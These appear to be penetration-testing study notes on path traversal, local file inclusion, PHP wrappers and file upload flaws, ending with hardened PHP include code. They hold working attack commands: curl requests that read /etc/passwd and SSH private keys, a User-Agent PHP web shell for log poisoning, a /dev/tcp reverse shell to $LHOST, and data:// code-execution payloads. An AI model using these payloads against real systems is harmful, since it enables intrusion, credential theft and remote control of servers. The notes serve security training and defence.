Path Traversal & File Inclusion
References:
- https://owasp.org/www-community/attacks/Path_Traversal
- https://github.com/OWASP/wstg/blob/master/document/4-Web_Application_Security_Testing/05-Authorization_Testing/01-Testing_Directory_Traversal_File_Include.md
Identifying Path Traversal
Look for URL parameters that reference files:
https://example.com/cms/login.php?language=en.html
Key observations:
- login.php tells us the server uses PHP
- language=en.html is a file reference we may be able to manipulate
- /cms/ suggests the app runs in a subdirectory of the web root
Discovery Checklist
- Hover over all buttons and check URLs
- Check all links
- Navigate to all accessible pages
- Examine target source code for file references
Linux Path Traversal
Default web root: /var/www/html
Test with a known file:
curl http://$TARGET/index.php?page=../../../../../../../../../etc/passwd
Retrieve SSH keys:
curl http://$TARGET/index.php?page=../../../../../../../../../home/offsec/.ssh/id_rsa
If you get a private key, set its permissions to 400 before using it:
chmod 400 stolen_key
ssh -i stolen_key -p 22 $USER@$TARGET
Windows Path Traversal
Test with a universally readable file:
curl http://$TARGET/index.php?page=C:\Windows\System32\drivers\etc\hosts
Read application logs:
curl http://$TARGET/index.php?page=C:\xampp\apache\logs\access.log
Local File Inclusion (LFI)
LFI takes path traversal further — if you can include a file that contains PHP code, the server will execute it.
Log Poisoning
If you can read the Apache access log via path traversal, inject PHP into the User-Agent header:
- Use Burp Repeater to send a request with a malicious User-Agent:
User-Agent: Mozilla/5.0 <?php echo system($_GET['cmd']); ?>
- Then trigger execution by including the log file with a command:
curl "http://$TARGET/index.php?page=../../../../var/log/apache2/access.log&cmd=id"
- For a reverse shell (URL-encoded):
# Raw: bash -c "bash -i >& /dev/tcp/$LHOST/$LPORT 0>&1"
curl "http://$TARGET/index.php?page=../../../../var/log/apache2/access.log&cmd=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F$LHOST%2F$LPORT%200%3E%261%22"
The bash -c wrapper ensures the payload runs under bash rather than the default sh shell, which may not support /dev/tcp or the >& redirect syntax.
PHP Wrappers
Reference: https://www.php.net/manual/en/wrappers.php
php://filter — Read Source Code
When including a PHP file directly returns only its rendered output (because PHP executes it), use the base64 filter to retrieve the raw source:
curl "http://$TARGET/index.php?page=php://filter/convert.base64-encode/resource=admin.php"
Decode the output:
echo "<base64-output>" | base64 -d
data:// — Execute Code
Inject and execute PHP directly:
curl "http://$TARGET/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"
With base64 encoding for complex payloads:
echo -n '<?php echo system($_GET["cmd"]);?>' | base64
curl "http://$TARGET/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=id"
If a command contains spaces, URL-encode them (%20 represents a space).
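For the defensive side of the LFI and wrapper techniques above, here is an added example (not from these notes) showing the vulnerable include pattern they target next to a hardened version. It assumes page templates live in /var/www/html/pages and that the request parameter is named page.

```php
<?php
// Added example, not from the original notes. Assumes templates are stored
// under /var/www/html/pages and the parameter is called "page".

// VULNERABLE: $_GET['page'] reaches include() unchanged, so ../../etc/passwd,
// php://filter/..., data://... and a poisoned access.log are all accepted.
function include_page_vulnerable(string $page): void
{
    include($page);
}

// HARDENED: strict name check, allowlist, then realpath() containment check.
const PAGES_DIR = '/var/www/html/pages';
const ALLOWED_PAGES = ['home', 'login', 'about'];

function resolve_page_safely(string $page): ?string
{
    // 1. Only plain page names: no slashes, dots, colons or NUL bytes, so
    //    "../", "php://" and "data://" are rejected before any file access.
    if (!preg_match('/^[a-z0-9_-]+$/', $page)) {
        return null;
    }
    // 2. Allowlist: only names the application knows map to a file.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    // 3. Resolve and verify the final path still sits under PAGES_DIR.
    //    realpath() collapses ".." and returns false for missing files.
    $base = realpath(PAGES_DIR);
    $real = realpath(PAGES_DIR . DIRECTORY_SEPARATOR . $page . '.php');
    if ($base === false || $real === false) {
        return null;
    }
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

$page = $_GET['page'] ?? 'home';
$path = resolve_page_safely($page);
if ($path === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $path;
```

Independently of the code, data:// (and remote http://) inclusion also depends on the php.ini setting allow_url_include, which should stay Off; php://filter is not governed by that setting, so the input validation above is still required.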
File Upload Vulnerabilities
Two categories:
- Direct execution — upload a file that the web server will execute (e.g., PHP script on a PHP-enabled server)
- Combined with another vuln — combine file upload with directory traversal to overwrite files like authorized_keys, or combine with XXE/XSS